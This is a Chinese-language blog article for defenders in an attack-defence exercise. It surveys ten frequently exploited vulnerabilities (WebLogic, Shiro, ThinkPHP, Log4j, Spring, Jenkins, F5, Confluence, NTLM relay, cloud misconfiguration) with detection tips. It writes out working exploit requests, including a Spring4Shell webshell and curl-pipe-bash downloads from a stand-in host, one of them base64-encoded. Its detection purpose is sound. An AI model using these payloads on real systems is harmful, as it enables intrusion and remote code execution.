HVV期间，红队最爱打的漏洞Top 10：从告警日志看实战攻击手法（附CVE编号）

HVV期间红队高频攻击漏洞Top 10：从流量特征到防御实战

网络安全攻防演练（HVV）已成为检验企业安全防护能力的"试金石"。作为防守方，我们每天面对海量告警，但真正值得关注的往往是那些被红队反复利用的高危漏洞。本文将基于近期HVV实战数据，剖析攻击者最青睐的十大漏洞及其流量特征，帮助蓝队成员快速识别真实威胁。

1. WebLogic系列RCE漏洞集群

Oracle WebLogic Server作为企业级中间件，其历史漏洞几乎成为每年HVV的"保留节目"。从流量设备捕获的数据显示，以下三个漏洞利用频率最高：

• CVE-2017-10271：通过WLS Security组件反序列化漏洞执行任意代码
• CVE-2019-2725：WebService组件XMLDecoder反序列化漏洞
• CVE-2020-14882：Console组件未授权访问+命令执行组合拳

典型攻击特征：

POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target.com Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>curl http://malicious.ip/shell.sh|bash</string></void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> </soapenv:Envelope>

防御建议：除及时打补丁外，建议在网络层限制/wls-wsat/*路径访问，并监控异常XML结构请求

2. Apache Shiro反序列化漏洞（CVE-2016-4437）

这个被称为Shiro-550的漏洞利用简单、影响广泛，在HVV中持续活跃。攻击者通过伪造RememberMe Cookie实现身份绕过和命令执行。

关键识别特征：

• Cookie中包含rememberMe=deleteMe字段
• 值长度异常（通常超过Base64编码后的正常长度）
• 请求体可能包含AES/CBC/PKCS5Padding等加密算法关键词

流量示例：

GET /admin HTTP/1.1 Host: target.com Cookie: rememberMe=ek5qSk9PbU13T1RBNE1qQXlNak0zT0Rjek5qSk9PbU13T1RBNE1qQXlNak0zT0Rjek5qSk9PbU13...

3. ThinkPHP多版本RCE漏洞

ThinkPHP框架的多个历史版本存在严重漏洞，其中以下两个在攻击流量中最常见：

典型攻击报文：

POST /index.php?s=captcha HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

4. Log4j2远程代码执行（CVE-2021-44228）

尽管漏洞披露已久，但JNDI注入仍是红队常用手段。在HVV期间观测到多种变体利用方式：

• 基础利用：${jndi:ldap://malicious.ip/exp}
• 绕过变种：使用${::-j}ndi等字符转义
• 二次跳转：通过DNS查询确认漏洞存在后，再发起真实攻击

注意：攻击者常将恶意负载隐藏在User-Agent、X-Forwarded-For等头部字段中

5. Spring Framework漏洞组合拳

Spring相关漏洞在近年HVV中呈现爆发趋势，最危险的组合是：

1. CVE-2022-22965（Spring4Shell）：

   GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di HTTP/1.1

2. CVE-2022-22963（Spring Cloud Function）：

   curl -X POST http://target.com/functionRouter -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('calc')" --data-raw 'data'

6. Jenkins脚本控制台漏洞

持续集成平台Jenkins的以下漏洞常被用于内网横向移动：

• CVE-2019-1003005（脚本安全沙箱绕过）
• CVE-2020-2100（Groovy代码执行）

攻击特征：

• 访问/script路径的POST请求
• 请求体包含Groovy代码片段
• 后续连接/jnlpJars/jenkins-cli.jar下载

7. F5 BIG-IP远程代码执行（CVE-2021-22986）

网络设备漏洞危害性极高，此漏洞利用特征明显：

POST /mgmt/tm/util/bash HTTP/1.1 Host: target.com Authorization: Basic [base64 creds] X-F5-Auth-Token: Content-Type: application/json {"command":"run","utilCmdArgs":"-c 'id'"}

8. Confluence OGNL注入（CVE-2022-26134）

Atlassian Confluence的未授权OGNL注入漏洞利用简单：

GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1 Host: target.com

9. Windows NTLM中继攻击

虽然不是具体CVE，但基于NTLM的横向移动在HVV中占比极高：

1. 通过Responder工具获取Net-NTLMv2哈希
2. 使用Impacket进行中继攻击
3. 利用PetitPotam等工具强制认证

防御关键：禁用LLMNR/NBT-NS、启用SMB签名

10. 云服务配置不当

越来越多的攻击针对云环境错误配置：

• AWS S3桶公开可写
• K8s Dashboard未授权访问
• 阿里云RAM密钥泄露

典型攻击链：

1. 扫描公开云资源 2. 获取临时凭证 3. 创建后门IAM用户 4. 部署挖矿容器或数据窃取

在最近一次HVV中，我们观察到攻击者使用新型混淆技术绕过检测：

# 伪装的"正常"Python请求 import requests from base64 import b64decode as decode def get_data(url): return requests.post(url, headers={'User-Agent': 'Mozilla/5.0'}, data={'param': decode('Y3VybCBodHRwOi8vbWFsd2FyZS5pcC9zaGVsbC5zaCB8IGJhc2g=')} ).text

防守方需要建立多层防御体系：

1. 实时流量分析：关注异常HTTP方法、特殊字符编码
2. 日志关联：将漏洞利用尝试与后续可疑行为关联
3. 威胁情报：订阅最新漏洞利用特征库
4. 蜜罐诱捕：部署伪装服务消耗攻击者资源